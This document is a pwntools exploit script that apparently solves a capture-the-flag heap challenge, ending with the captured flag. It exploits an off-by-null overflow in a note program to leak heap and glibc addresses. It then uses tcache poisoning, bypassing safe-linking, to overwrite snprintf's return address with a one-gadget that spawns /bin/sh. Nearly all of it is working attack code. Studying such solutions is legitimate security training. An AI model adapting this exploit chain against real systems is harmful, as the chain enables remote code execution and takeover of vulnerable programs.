from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

p = gdb.debug('./prob_patched', '''
    # b snprintf
    # b *__GI___snprintf+173
    continue
''')

# p = remote('333afa0ca5a4ef55.chal.ctf.ae', 443, ssl=True)

# malloc a chunk of size (length+0xc) with data (content) at incremented index (fill newly allocated chunk with zero bytes first)
# note structure has four parts: time (8 bytes, generated by time(NULL)), length (2 bytes, set as length), flag (2 bytes, set as 1), content (length-1 non-zero bytes of string at most, processed by fgets and snprintf)
# critical vulnerability in fgets(buf, note->length+0x20, stdin) and &note->content+snprintf(buf, note->length, "%s", buf)=0
# for current chunk's note, if fgets reads in a string longer than note->length-1, snprintf returns a value greater than note->length-1, which can cause an off-by-null overflow into next adjacent chunk's note->length
def make(length, content):
    p.sendlineafter(b"> ", b'1')
    p.sendlineafter(b"Input Note len: ", str(length).encode())
    if len(content) == length+0x20-1:
        p.sendafter(b"Note: ", content)
    elif len(content) < length+0x20-1:
        p.sendlineafter(b"Note: ", content)

# modify a chunk at index with content
# if note->flag is 1, read note->length-1 bytes of data at most from stdin into note->content (read(0, note->content, note->length-1))
def edit(index, content):
    p.sendlineafter(b"> ", b'2')
    p.sendlineafter(b"Edit Note Index: ", str(index).encode())
    p.sendafter(b"Note: ", content)

# free a chunk at index
# if note->flag is 1, set note->flag to 0, free note chunk, and null its pointer
def delete(index):
    p.sendlineafter(b"> ", b'3')
    p.sendlineafter(b"Delete Note Index: ", str(index).encode())

# print out a chunk at index
# if note->flag is 1, print out note->time in an appropriate format and write note->length-1 bytes of data from note->content to stdout (write(1, note->content, note->length-1))
def view(index):
    p.sendlineafter(b"> ", b'4')
    p.sendlineafter(b"View Note Index: ", str(index).encode())
    p.recvuntil(b" | ")
    p.recvuntil(b" | ")
    return p.recvuntil(b"1. Make", drop=True)

glibc_e = ELF('./libc.so.6')

# Stage 1: trigger off-by-null to leak heap base address and glibc base address
make(0x38-0xc, b'A') # 0: heap_base_addr+0x2a0
make(0x38-0xc, b'A') # 1: heap_base_addr+0x500
make(0x38-0xc, b'A') # 2: heap_base_addr+0x540
# trigger off-by-null from chunk at heap_base_addr+0x500 to set note->length of chunk at heap_base_addr+0x540 to 0
delete(1)
make(0x38-0xc, b'A'*(0x38-0xc+0x10-1)) # 3: heap_base_addr+0x500
# place heap address at heap_base_addr+0x580
make(0x38-0xc, b'A') # 4: heap_base_addr+0x580
delete(4)
# place glibc address at heap_base_addr+0x5c0
make(0xf28-0xc, b'A') # 5: heap_base_addr+0x5c0
delete(5)
# view chunk 2 at heap_base_addr+0x540 to print out note->length-1=0xffff bytes of data starting from &note->content to leak heap and glibc
leaks_1 = view(2)[4:]  # chunk 2 at heap_base_addr+0x540 is able to integer overflow
heap_base_addr = u64(leaks_1[0x30:0x38])<<12
log.info(f"heap base address: {hex(heap_base_addr)}")
glibc_base_addr = u64(leaks_1[0x70:0x78])-(glibc_e.symbols['main_arena']+96)
log.info(f"glibc base address: {hex(glibc_base_addr)}")

# Stage 2: tcache poisoning to leak snprintf return address
# this leak technique is based on a free just after tcache poisoning and takes place in post tcache poisoning stage
# it can typically copy a qword (in a "double-safe-linking-encrypted" form) in any specified address (16-byte aligned) into heap area
make(0x48-0xc, b'A') # 6: heap_base_addr+0x5c0
make(0x48-0xc, b'A') # 7: heap_base_addr+0x610
make(0x48-0xc, b'A') # 8: heap_base_addr+0x660
# prepare for tcache poisoning
delete(7)
delete(6)
# now tcache bin of size 0x50 is heap_base_addr+0x5c0 -> heap_base_addr+0x610
edit(2, b'\x00'*(4+0x28)+p64(0x41)+b'\x00'*0x38+p64(0x51)+p64((glibc_base_addr+glibc_e.symbols['__libc_argv'])^((heap_base_addr+0x5c0)>>12))) # chunk 2 at heap_base_addr+0x540 is able to integer overflow
# now tcache bin of size 0x50 is heap_base_addr+0x5c0 -> glibc_base_addr+glibc_e.symbols['__libc_argv'] -> [*(glibc_base_addr+glibc_e.symbols['__libc_argv'])]^((glibc_base_addr+glibc_e.symbols['__libc_argv'])>>12)
# perform tcache poisoning
make(0x48-0xc, b'A') # 9: heap_base_addr+0x5c0
make(0x48-0xc, b'A') # 10: glibc_base_addr+glibc_e.symbols['__libc_argv']
# now tcache bin of size 0x50 is *(glibc_base_addr+glibc_e.symbols['__libc_argv'])
delete(8)
# now tcache bin of size 0x50 is heap_base_addr+0x660 -> [*(glibc_base_addr+glibc_e.symbols['__libc_argv'])]^((glibc_base_addr+glibc_e.symbols['__libc_argv'])>>12)
leaks_2 = view(2)[4:]
snprintf_return_addr = (u64(leaks_2[0x110:0x118])^((heap_base_addr+0x660)>>12)^((glibc_base_addr+glibc_e.symbols['__libc_argv'])>>12))-0x200
log.info(f"snprintf return address: {hex(snprintf_return_addr)}")

# Stage 3: tcache poisoning to overwrite snprintf return address with one gadget
# here reason why choosing overwrite snprintf return address is that note->content always starts from &note+0xc and snprintf function has no stack canary protection
make(0x58-0xc, b'A') # 11: heap_base_addr+0x6b0
make(0x58-0xc, b'A') # 12: heap_base_addr+0x710
# prepare for tcache poisoning
delete(12)
delete(11)
# now tcache bin of size 0x60 is heap_base_addr+0x6b0 -> heap_base_addr+0x710
edit(2, b'\x00'*(4+0x28)+p64(0x41)+b'\x00'*0x38+p64(0x51)+b'\x00'*0x48+p64(0x51)+b'\x00'*0x48+p64(0x51)+b'\x00'*0x48+p64(0x61)+p64((snprintf_return_addr-0x18)^((heap_base_addr+0x6b0)>>12)))
# now tcache bin of size 0x60 is heap_base_addr+0x6b0 -> snprintf_return_addr-0x18
# perform tcache poisoning
make(0x58-0xc, b'A') # 13: heap_base_addr+0x6b0
# 0xebcf5 execve("/bin/sh", r10, rdx)
# constraints:
#   address rbp-0x78 is writable
#   [r10] == NULL || r10 == NULL || r10 is a valid argv
#   [rdx] == NULL || rdx == NULL || rdx is a valid envp
# overwrite snprintf return address with one gadget
make(0x58-0xc, b'A'*(0x18-0xc)+p64(glibc_base_addr+0xebcf5)) # 14: snprintf_return_addr-0x18
# one gadget will be triggered once returning from snprintf function

p.interactive()

# flag{0a2057dd2c1b0d1f}